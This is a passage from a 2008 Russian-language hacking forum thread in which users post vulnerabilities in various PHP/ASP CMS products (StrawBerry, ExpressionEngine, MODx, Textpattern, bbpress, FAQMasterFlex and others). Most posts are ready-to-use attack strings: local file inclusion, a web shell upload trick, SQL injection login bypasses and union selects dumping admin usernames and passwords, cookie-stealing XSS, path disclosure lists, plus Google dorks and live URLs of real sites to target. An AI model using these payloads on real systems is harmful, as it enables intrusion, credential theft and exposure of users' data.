ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #71  
Старый 21.11.2008, 02:59
Аватар для Smapt
Smapt
Познающий
Регистрация: 29.01.2008
Сообщений: 82
Провел на форуме:
373690

Репутация: 88
По умолчанию

StrawBerry 1.1.1 (бывший CuteNews)

Инклюд для версии с TXT базами:
Код:
http://localhost/example/index.php?do=../../../../db/base/users.MYD%00
Инклюд по такому принципу присутствует во всех ТХТ версиях StrawBerry и CuteNews

Заливка шела:
Админка->Настройки->Управление картинками
переименовываем шелл в .jpg и заливаем на серв.
Жмём "переименовать", меняем разрешение обратно на пхп, получаем шел. Для StrawBerry 1.1.1, т.к. доступ к папке аплоад запрежён переименовываем в "../../shell.php" получаем _ttp://localhost/shell.php
 
Ответить с цитированием

  #72  
Старый 01.12.2008, 03:45
Аватар для Ded MustD!e
Ded MustD!e
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684

Репутация: 3908
По умолчанию

Active Business Directory v 2 (Auth Bypass) SQL Injection Vulnerability

script: Active Business Directory v 2
found: Ded MustD!e

exploit: http://www.activewebsoftwares.com/demoactivebusinessdirectory/account.asp

E-mail Address: ' or ' 1=1
Password: ' or ' 1=1

ASPReferral v 5.3 (Auth Bypass) SQL Injection Vulnerability

script: ASPReferral v 5.3
found: Ded MustD!e

exploit: http://www.activewebsoftwares.com/demoaspreferral/Merchant.asp

E-mail Address: ' or ' 1=1--
Password: ' or ' 1=1--
 
Ответить с цитированием

  #73  
Старый 07.12.2008, 06:16
Аватар для Qwazar
Qwazar
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912

Репутация: 4693


По умолчанию

ExpressionEngine Core v. 1.6.6 и другие версии и модификации вроде бы тоже (пишут, что за бугром популярен)

Алгоритм хеширования: sha1(pass) - по дефолту, или md5(pass).

XSS (Кстати, этим скриптом можно отправить кому угодно письмо с уязвимого сервера, с обратным адресом владельца блога):
Код:
POST: http://test1.ru/system/utilities/email_test.php 
recipient=1"><script>alert(/XSS1/)</script>&subject=2"><script>alert(/XSS2/)</script>&message=3"></textarea><script>alert(/XSS3/)</script>
При неудалённом install.php:
LFI:
Код:
http://test1.ru/install.php?page=4
system_dir=system&ext=/../../1.php
//Если system_dir не system (по дефолту), то следует изменить на актуальный.
LFI:
Код:
http://test1.ru/install.php?page=5
ext=/../../1.php
LFI:
Код:
http://test1.ru/install.php?page=6
ext=/../../1.php
LFI:
Код:
http://test1.ru/install.php?page=7
rebuild_config=1&ext=/../../1.php
Раскрытие путей :
Код:
http://test1.ru/system/utilities/admin.php
http://test1.ru/system/utilities/dbtest.php
Раскрытие путей (при register_globals=ON):
Код:
http://test1.ru/system/update.php?conf=1
Раскрытие информации о пользователях, префикса таблиц БД, ip адресов юзеров(да и не только):

Папки не спрятаны .htaccess'ом, в диком интернете в db_cache можно найти интересную информацию:
Код:
/system/cache/sql_cache/
/system/cache/db_cache/
/system/cache/magpie_cache/
/system/cache/page_cache/
/system/cache/tag_cache/
Например: http://concerningdesign.org/system/cache/db_cache/6a992d5529f459a44fee58c733255e86/6c6237982ae04c3a69cea9d2ca9a6a3e (информация о пользователях логин, мыло и т.п.)

dork: "powered by ExpressionEngine" (кстати, действительно, довольно много)
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..

Мой блог:http://qwazar.ru/.

Последний раз редактировалось Qwazar; 07.12.2008 в 08:36..
 
Ответить с цитированием

Energine
  #74  
Старый 07.12.2008, 17:56
Аватар для baltazar
baltazar
Banned
Регистрация: 30.03.2007
Сообщений: 344
Провел на форуме:
5149122

Репутация: 2438
Отправить сообщение для baltazar с помощью ICQ
По умолчанию Energine

скину сюда,потому что я ослеп,и не вижу тему "Уязвимости бесплатных ЦМС"

SQL Inj:


Код:
site.com/news.php?id=-1%27%20union%20select%201,username,password,4,5%20 from%20dir_admins/*
XSS:

В поиск:
Код:
"><script>alert()</script>
 
Ответить с цитированием

  #75  
Старый 07.12.2008, 22:44
Аватар для 0nep@t0p
0nep@t0p
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
Провел на форуме:
2313429

Репутация: 728
По умолчанию

CMS: [ ACMS™ ]

Developer: [ http://www.acalog.com/ ]

Dork: [ Powered by the acalog™ academic catalog management system (ACMS™) inurl:"?coid=" ]

Bug type: [ Blind Sql Injection ]

Bug: [ coid=63+and+ascii(lower(substring((version()),1,1) ))=52/* ]

Example: [ http://catalog.sdstate.edu/preview_course.php?catoid=2&coid=63+and+ascii(lowe r(substring((version()),1,1)))=52/* ]


Примечательно, что большинство сайтов с бажной цмс находятся в доменной зоне .edu
 
Ответить с цитированием

Уязвимости FAQMasterFlex
  #76  
Старый 12.12.2008, 00:55
Аватар для Dimi4
Dimi4
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
Провел на форуме:
7617458

Репутация: 3965


Отправить сообщение для Dimi4 с помощью ICQ
По умолчанию Уязвимости FAQMasterFlex

[Уязвимости FAQMasterFlex]
Условие: magic_quotes_gpc = OFF
1.
File:faq.php
Уязвимый кусок кода:

PHP код:
 $result mysql_query("SELECT * FROM faqs WHERE category_id = '$category_id'") or die(mysql_error()); 
SQL иньекция:

Код:
http://path/FAQMasterFlex/faq.php?answer=2&cat_name=FAQMasterFlex%20Usage&category_id=1'+union+select+1,2,concat_ws(0x3a,database(),version(),user()),4/*
2.
File:faq_admin.php
Уязвимый кусок кода:

PHP код:
 $result mysql_query("SELECT * FROM faqs WHERE category_id = '$category'") or die(mysql_error()); 
SQL иньекция:

Код:
http://path/FAQMasterFlex/faq_admin.php?category='+union+select+1,2,concat_ws(0x3a,database(),version(),user()),4/*&cat_name=
Google dork:"Powered by Lethal Penguin."

http://www.lethalpenguin.net/design/faqmasterflex.php?download=true
 
Ответить с цитированием

  #77  
Старый 14.12.2008, 19:18
Аватар для iddqd
iddqd
Banned
Регистрация: 19.12.2007
Сообщений: 924
Провел на форуме:
4192567

Репутация: 2145


По умолчанию

Textpattern v.4.0.3

Passive XSS
Код:
http://localhost/textpattern/index.php?event=tag&name=image&id=1&ext=</textarea><script>alert(document.cookie)</script>&alt=&h=1&w=400&type=textile
Код:
http://localhost/textpattern/index.php?event=log&step=list&page=1<script>alert(document.cookie)</script>
Active XSS
Написать новую статью => http://localhost/textpattern/index.php?event=article => в заголовок вставляем код
Код:
<script>alert()</script> или </title><script>alert()</script>
Категории => уязвимо поле "Название".

Файлы => поле "Описание".

Ссылки => поля "Заголовок" и "Описание".

(c) iddqd

Последний раз редактировалось iddqd; 15.12.2008 в 13:38..
 
Ответить с цитированием

  #78  
Старый 19.12.2008, 19:50
Аватар для Qwazar
Qwazar
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912

Репутация: 4693


По умолчанию

MODx 0.9.6.2

Passive XSS
Код:
/assets/modules/docmanager/includes/tv.ajax.php
POST: tplID=-1&langNoTV=<body onLoad=alert('ok')>
Код:
/assets/plugins/tinymce3101/tinymce.linklist.php?list=<script>alert(/XSS/)</script>
register_globals ON
Код:
/assets/snippets/ditto/extenders/request.extender.inc.php?dbg=1&stripTags=0&ditto_<script>alert(/XSS/)</script>
register_globals ON
В этом случае забавно то, что XSS в имени параметра, а вот значение фильтруется жёстко.

Раскрытия путей
Код:
assets/cache/siteCache.idx.php

manager/includes/rss.inc.php
manager/includes/browsercheck.inc.php
manager/includes/sniff/phpSniff.class.php
manager/includes/extenders/getUserData.extender.php

assets/snippets/ditto/formats/xml.format.inc.php
assets/snippets/ditto/formats/rss.format.inc.php
assets/snippets/ditto/formats/json.format.inc.php
assets/snippets/ditto/classes/debug.class.inc.php
assets/snippets/ditto/formats/atom.format.inc.php
assets/snippets/ditto/extenders/tagging.extender.inc.php

manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php

assets/plugins/tinymce3101/jscripts/tiny_mce/plugins/spellchecker/classes/PSpell.php
assets/plugins/tinymce3101/jscripts/tiny_mce/plugins/spellchecker/classes/GoogleSpell.php
assets/plugins/tinymce3101/jscripts/tiny_mce/plugins/spellchecker/classes/EnchantSpell.php
assets/plugins/tinymce3101/jscripts/tiny_mce/plugins/spellchecker/classes/PSpellShell.php
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..

Мой блог:http://qwazar.ru/.
 
Ответить с цитированием

bbpress
  #79  
Старый 20.12.2008, 16:26
Аватар для baltazar
baltazar
Banned
Регистрация: 30.03.2007
Сообщений: 344
Провел на форуме:
5149122

Репутация: 2438
Отправить сообщение для baltazar с помощью ICQ
По умолчанию bbpress

bbpress v1.0


File:
realplay.php

Уязвимый кусок кода:

Код:
<?php
echo (get_magic_quotes_gpc() ? stripslashes($_GET['link']) : $_GET['link']);
?>
XSS иньекция:

Код:
http:/path/inc/realplay.php?link=%3Cscript%3Ealert(document.cooki e)%3C/script%3E


Активная XSS:



В /inc/realplay.php поле email вводим:

Код:
<script>alert()</script>

Последний раз редактировалось baltazar; 20.12.2008 в 16:28..
 
Ответить с цитированием

  #80  
Старый 20.12.2008, 22:30
Аватар для baltazar
baltazar
Banned
Регистрация: 30.03.2007
Сообщений: 344
Провел на форуме:
5149122

Репутация: 2438
Отправить сообщение для baltazar с помощью ICQ
По умолчанию

WorkingOnWeb

File: admin.inc.php

Уязвимый кусок кода:

Код:
$user = "";
$pass = "";
if (isset($_POST['loginname']) && $_POST['loginname'] != "")
$user = $_POST['loginname'];
if (isset($_POST['loginpass']) && $_POST['loginpass'] != "")
$pass = $_POST['loginpass'];
$loggedin = $this->loginuser($user, $pass);

SQL Иньекция:

Код:
http://path/articles/rss.php?category=-1/**/union/**/select/**/1,2,login,password/**/from/**/users/*

XSS иньекция:

Код:
http://path/wow/index.php/"><script>alert(document.cookie)</script>
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Библиотека SladerNon Болталка 17 05.02.2007 23:30
Основные методы взлома и защиты скриптов на Php DIAgen Авторские статьи 8 28.05.2006 12:30



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ